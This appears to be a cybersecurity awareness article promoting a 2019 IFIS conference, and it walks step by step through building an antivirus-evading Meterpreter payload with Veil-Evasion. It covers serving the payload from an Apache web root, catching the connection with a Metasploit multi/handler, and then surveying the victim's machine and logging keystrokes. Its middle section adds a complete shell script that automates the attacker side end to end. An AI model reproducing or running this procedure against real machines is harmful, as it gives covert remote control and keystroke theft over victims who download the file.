For those who understand technology, we live in an extremely interesting time. We are reminded almost daily of the struggles of corporations by headlines announcing the latest breach. Major parts of the American infrastructure have been called "indefensible" by those tasked with securing it, and nation-states have not only seen the value in waging cyber-attacks against each other but have started doing so, amassing large cyber-armies. At the top of this pyramid sits the payload. A payload is the program a hacker runs on your computer, mobile phone or other internet-connected device in order to gain access to it.
With a payload in place, the hacker can move through the target's systems invisibly and silently, manipulate whatever they want, go wherever they want, and afterwards erase every trace of their presence.
How a Hacker gets into a protected system
To create payloads that evade detection, the attacker uses a framework called Veil. Its Evasion module generates payloads designed to get past the security controls on the target's side and to stay undetected once there: antivirus software, intrusion detection systems, firewalls, web application firewalls and others. Nearly all of these controls rely on signature-based detection, matching files and traffic against a database of known exploit and payload signatures, so a freshly generated payload that matches no known signature passes straight through them. Veil-Evasion lets an attacker produce such payloads quickly and without much expertise, which is why signature-based controls on their own are not a sufficient defence; behaviour-based detection and outbound connection monitoring still have a chance of catching the payload once it runs.
Once Veil is launched, the attacker selects option 1, Evasion, which offers 41 payloads that can be used to create malicious content for execution on the target's machine.
The list command displays those payloads so the attacker can pick a base payload to work from.
An APT actor might select payload number 7, which is written in C, to produce an executable that will be delivered through the target's browser and run on the target's machine without being detected.
The hacker then sets LHOST to the IP address on which the listener will wait for the target's connection, and LPORT to 8080, a port commonly used by web proxies and therefore unlikely to raise suspicion when the target's machine connects back to it.
The attacker then generates the malicious executable, built for the Windows operating system, which Veil stores under /var/lib/veil/output/compiled/ on the attacker's machine.
The generated file is copied to /var/www/html so that the web server will serve it when the target browses to the attacker's site.
The Apache2 web server is started on the attacker's machine (it is the attacker who hosts the file, not the target), together with the PostgreSQL database that Metasploit uses, and the PostgreSQL status is checked to confirm it is up.
The attacker then opens msfconsole to set up a listener that will receive the connection from the target.
In msfconsole the attacker loads the generic handler (exploit/multi/handler), sets the payload to the Meterpreter reverse_tcp payload matching the one Veil generated so the handler can complete the connection from the target, sets the listening IP (LHOST) and port (LPORT) to the same values used when the payload was built, and runs exploit.
As soon as the target downloads the file through their browser and runs it, a Meterpreter session opens on the attacker's side.
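The attacker-side steps above, scripted end to end, as an added example that is not code from the original article or from the Veil or Metasploit projects. The msfconsole handler is written to a resource file so the listener setup is repeatable rather than typed by hand. Everything not stated in the article is an assumption: the attacker address 192.0.2.10 (a documentation range), Veil 3's non-interactive command line (-t/--tool, -p, --ip, --port, -o) replacing the interactive menu choices, the payload name c/meterpreter/rev_tcp.py for the C Meterpreter payload, the output name "update", and Veil's default output directory /var/lib/veil/output/compiled.

```shell
#!/bin/sh
# Added example, not from the original article or from Veil/Metasploit.
# Assumptions not in the article: attacker address 192.0.2.10, Veil 3's
# non-interactive CLI (-t/--tool, -p, --ip, --port, -o), the payload name
# c/meterpreter/rev_tcp.py, the output name "update", and Veil's default
# output directory /var/lib/veil/output/compiled.

# Write the msfconsole commands the article describes typing by hand.
# Usage: write_handler_rc FILE LHOST LPORT   (prints FILE)
write_handler_rc() {
    rc="$1"; lhost="$2"; lport="$3"
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
    printf '%s\n' "$rc"
}

# Copy the compiled executable into the web root that Apache serves.
# Usage: stage_payload SRC_EXE WEBROOT   (prints the staged path)
stage_payload() {
    src="$1"; webroot="$2"
    [ -f "$src" ] || { echo "payload not found: $src" >&2; return 1; }
    mkdir -p "$webroot"
    cp "$src" "$webroot/"
    printf '%s/%s\n' "$webroot" "$(basename "$src")"
}

# The whole attacker-side procedure. Runs only when invoked as: sh stage.sh run
run_attack() {
    lhost="${LHOST:-192.0.2.10}"   # address the target can reach (assumed)
    lport="${LPORT:-8080}"         # proxy-like port, as in the article

    # Veil -> Evasion -> C Meterpreter reverse_tcp, LHOST/LPORT set, compiled for Windows
    veil -t Evasion -p c/meterpreter/rev_tcp.py --ip "$lhost" --port "$lport" -o update

    # Stage the file in Apache's web root and bring up the services on the attacker machine
    stage_payload /var/lib/veil/output/compiled/update.exe /var/www/html
    service apache2 start
    service postgresql start
    service postgresql status

    # The handler waits until the target downloads and runs the file
    rc=$(write_handler_rc /tmp/handler.rc "$lhost" "$lport")
    msfconsole -q -r "$rc"
}

case "${1:-}" in
    run) run_attack ;;
esac
```

Invoked without the run argument the script only defines the functions; with it, LHOST must be the address the target can actually reach, and LPORT must match on both the generated payload and the handler or the connection back will never be completed.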
System exploration and manipulation
With a Meterpreter session open, the hacker can survey the whole machine, starting with the ps command to list the processes running on the target.
The pwd command shows the current working directory on the target machine, and ls then lists the files and directories under the target's home or root directory.
The hacker can check how long the target has been away from the keyboard with the idletime command, and may choose to capture the target's keystrokes with the keyscan_start, keyscan_dump and keyscan_stop commands.
Think this sounds like the plot of the next Hollywood sci-fi movie? Unfortunately, the threat is far more real than that, and it is only getting worse. Cases in which a hacker manipulates systems in exactly this way are happening in the real world, and the only thing scarier is what the future holds.
You need to be sensitized to the risks of cyber-attacks and threats to the systems you operate. Join us at IFIS, in partnership with Summit Consulting, for our annual cyber-security awareness and risk management conference, from 16th to 18th October 2019.
For more details and registration procedure, please click here.